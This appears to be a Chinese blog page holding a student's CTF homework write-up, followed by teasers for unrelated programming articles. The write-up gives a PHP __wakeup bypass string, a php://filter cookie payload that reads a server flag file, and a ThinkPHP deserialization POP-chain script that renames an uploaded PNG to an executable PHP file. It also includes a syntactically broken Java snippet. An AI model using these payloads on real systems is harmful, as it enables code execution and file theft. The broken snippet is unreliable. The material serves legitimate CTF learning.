当前位置：首页 > article >正文

1.21作业

article 2026/4/10 16:45:31

1 unserialize3

当序列化字符串中属性个数大于实际属性个数时，不会执行反序列化

外部如果是unserialize（）会调用wakeup（）方法，输出“bad request”——构造url绕过wakeup

类型：public class，直接构造：
O:4:"xctf":1:{s:4:"flag";s:3:"111";} 改为：O:4:"xctf":2:{s:4:"flag";s:3:"111";}

2

“找出攻击者的IP”

http协议中，

可疑：POST了hacker.php,追踪hacker.php，url解码，确认是开了个后门

3

进入

就是base64解码

4

只出现一次的数字

class Solution{public int singleNumber(int[t] nums){int result = 0;for (int num : nums)}{result =resut ^num;}return result;}
}

5 fileinclude

PHP: php:// - Manual

Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

upload3

注册登录，对头像尝试文件上传，但无法执行

进行目录扫描获取源码，TP5框架

profile.php

cookie有个反序列化，审完代码以后可以i使用(覆盖掉filename)

if：前两个判断不用改就可以绕过，进ext_check()判断

然后赋值ext
接下来把 filename_tmp 移动到 filename时，就可以把 png 移动为 php 文件了。

_get()与_call()：作用上传图像访问，被访问不存在时调用 upload_img（）

从而调用其中的 index 方法，再跳到 upload_img() 了。

<?phpnamespace app\web\controller;
error_reporting(0);
class Profile
{public $checker;public $filename_tmp;public $filename;public $upload_menu;public $ext;public $img;public $except;public function __get($name){return $this->except[$name];}public function __call($name, $arguments){if($this->{$name}){$this->{$this->{$name}}($arguments);}}}class Register
{public $checker;public $registed;public function __destruct(){if(!$this->registed){$this->checker->index();}}}$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
$profile->filename_tmp = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.png";
$profile->filename = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.php";$register = new Register();
$register->registed = false;
$register->checker = $profile;echo urlencode(base64_encode(serialize($register)));

ThinkPHP5.1反序列化漏洞利用-CSDN博客

1.21作业

1 unserialize3 当序列化字符串中属性个数大于实际属性个数时，不会执行反序列化外部如果是unserialize（）会调用wakeup（）方法，输出“bad request”——构造url绕过wakeup 类型：public class&…...

编程日记 2026/4/8 5:54:10

深入浅出：理解闭包在JavaScript中的应用

什么是闭包闭包（Closure）是 JavaScript 中的一个重要概念，也是函数式编程中的核心特性之一。简单来说，闭包是指一个函数能够访问并记住其词法作用域（Lexical Scope），即使这个函数在其词法作用…...

编程日记 2026/4/6 2:18:58

【Quest开发】全身跟踪（一）

软件：Unity 2022.3.51f1c1、vscode、Meta XR All in One SDK V72 硬件：Meta Quest3 最终效果：能像meta的操作室沉浸场景一样根据头盔移动来推断用户姿势，实现走路、蹲下、手势匹配等功能需要借助UnityMovement这个包 GitHub …...

编程日记 2026/4/9 11:59:09

【QT中的一些高级数据结构，持续更新中...】

QT中有一些很精妙、便捷的设计，在了解这些数据的同时，我们可以学到如何更好的设计代码。本贴持续更新中，欢迎关注和收藏一 QScopedPointer主要特点：示例代码二 Q_DISABLE_COPY 一 QScopedPointer QScopedPointer 是 Qt 中的一种…...

编程日记 2026/2/15 14:43:18

JS：页面事件

文章目录一、页面加载事件二、页面滚动事件三、页面尺寸事件总结一、页面加载事件有时候我们会把script的内容放在body前，这时候代码的执行在元素的加载之前，会导致页面元素未加载而报错解决办法是调用Window的load加载事件，将所有操作放…...

编程日记 2026/4/8 1:57:17

✨ 索引有哪些缺点以及具体有哪些索引类型

索引的定义与原理索引是数据库中用于提高数据检索效率的数据结构。它就像是书籍的目录，通过目录可以快速定位到所需内容的页码，而在数据库中，索引可以帮助数据库系统快速找到符合查询条件的数据行，而不必对整个表进行扫描。其…...

编程日记 2026/4/10 5:36:46

C++ ——继承

体现的是代码复用的思想 1、子类继承父类，子类就拥有了父类的特性（成员方法和成员属性） 2、已存在的类被称为“基类”或者“父类”或者“超类”；新创建的类被称为“派生类”或者“子类” 注意： （1&#…...

编程日记 2026/2/16 15:19:16

vue,vue3 keepalive没有效果，无法缓存页面include无效，keep-alive

keepalive没有效果，无法缓存页面？ 问题大概是组件的name值不对应，vue2修改组件文件的name值，vue3保持组件文件名称和路由页面配置的name一致就可以了，如果vue3不想保持一致，必须手动在文件后面添加export..…...

编程日记 2026/4/2 2:56:59

DeepSeek智能测试知识库助手PRO版：多格式支持+性能优化

前言测试工程师在管理测试资产时，需要面对多种文档格式、大量文件分类及知识库的构建任务。为了解决这些问题，我们升级了 DeepSeek智能测试知识库助手，不仅支持更多文档格式，还加入了多线程并发处理和可扩展格式支持，大幅提升处理性能和灵活性。主要功能亮点：多格…...

编程日记 2026/4/9 15:57:17

【ELK】【Elasticsearch】数据查询方式

1. 简单查询（URI Search） 通过 URL 参数直接进行查询，适合简单的搜索场景。示例： bash 复制 GET /index_name/_search?qfield_name:search_value 说明： index_name：索引名称。 field_name&#xf…...

编程日记 2026/3/5 15:11:13

Kotlin 优雅的接口实现

1. 日常遇到的冗余的接口方法实现日常开发中，经常会要实现接口，但是很多场景中，只需要用到其中一两个方法，例如 ActivityLifecycleCallbacks，它有很多个接口需要实现，但是很多时候我们只需要用到其中的一…...

编程日记 2026/3/16 3:51:46

go 通过ssh连接linux golang.org/x/crypto/ssh

ssh.Dial golang.org/x/crypto/ssh package mainimport ("bytes""log""os""strings""golang.org/x/term""golang.org/x/crypto/ssh" )// go ssh 连接ssh // 参考blog： // // https://www.cnblogs.c…...

编程日记 2026/2/26 6:34:46

纯手工搭建整套CI/CD流水线指南

目录一、前言二、环境准备 1、服务器开荒（192.168.1.200） 2、离线资源清单（提前用U盘拷好） 三、硬核安装：比拧螺丝还细的步骤 Step1：搭建GitLab（注意！这是只内存饕餮&#xf…...

编程日记 2026/4/6 4:40:10

智能硬件新时代，EasyRTC开启物联音视频新纪元

在万物互联的时代浪潮中，智能硬件正以前所未有的速度融入我们的生活，从智能家居的便捷控制，到智能穿戴设备的健康监测，再到工业物联网的高效管理，智能硬件的应用场景不断拓展。而在这个智能硬件蓬勃发展的背后&#xf…...

编程日记 2026/4/9 4:35:32

Rust编程语言入门教程（八）所有权 Stack vs Heap

Rust 系列 🎀Rust编程语言入门教程（一）安装Rust🚪 🎀Rust编程语言入门教程（二）hello_world🚪 🎀Rust编程语言入门教程（三） Hello Cargo&#x1f…...

编程日记 2026/4/5 6:00:44

spring 狂神说的详细笔记（完整版）

最近在B站找教程视频自学java框架（SSM），最后发现自己迷上了狂神说，不得不说秦疆老师讲得太好了，通俗易懂，而且在听他的课你会不由衷得到一些思想的启发和转变，而且教程视频还是无偿免费的&…...

编程日记 2026/3/23 0:09:01

交易所开发:数字市场的核心动力

数字资产交易所作为连接用户与市场的核心枢纽，已成为推动数字经济发展的关键引擎。其开发不仅需要技术创新，还需兼顾用户体验、合规安全与生态构建，以下是交易所开发的核心要素与实践路径分析： 一、交易所的核心定位与技术架构…...

编程日记 2026/4/5 7:30:11

C++ 课程设计汇总（含源码）

C 课程设计 [C课程设计个人账务管理系统(含源码)](https://arv000.blog.csdn.net/article/details/145601695)[C课程设计运动会分数统计（含源码）](https://arv000.blog.csdn.net/article/details/145601819)[C 课程设计打印万年历（含源码&a…...

编程日记 2026/2/15 12:44:39

android调用ffmpeg解析rtsp协议的视频流

文章目录一、背景二、解析rtsp数据1、C层功能代码2、jni层的定义3、app层的调用三、源码下载一、背景本demo主要介绍android调用ffmpeg中的接口解析rtsp协议的视频流（不解析音频），得到yuv数据，把yuv转bitmap在android设备上显…...

编程日记 2025/7/29 16:33:36

Android 之 AIDL for HAL

Android AIDL for HAL 的作用与实现作用： Android AIDL for HAL（Android Interface Definition Language for Hardware Abstraction Layer）旨在统一 HAL 开发接口，替代 HIDL（Hardware Interface Definition Language…...

编程日记 2026/2/14 16:23:23

Jmeter进阶篇（34）如何解决jmeter.save.saveservice.timestamp_format=ms报错？

问题描述今天使用Jmeter完成压测执行，然后使用命令将jtl文件转换成html报告时，遇到了报错！大致就是说jmeter里定义了一个jmeter.save.saveservice.timestamp_format=ms的时间格式，但是jtl文件中的时间格式不是标准的这个ms格式，导致无法正常解析。对于这个问题，有如下…...

编程日记 2026/4/10 3:06:29

TensorFlow v2.16 Overview

TensorFlow v2.16 Overview 一、模块 Modules二、类 Classes三、函数 Functions TensorFlow v2.16.1 Overview 一、模块 Modules 模块是TensorFlow中组织代码的一种方式，将相关的功能和类封装在一起，方便用户使用和管理。每个模块都提供了特定领域的公共…...

编程日记 2025/11/28 15:57:34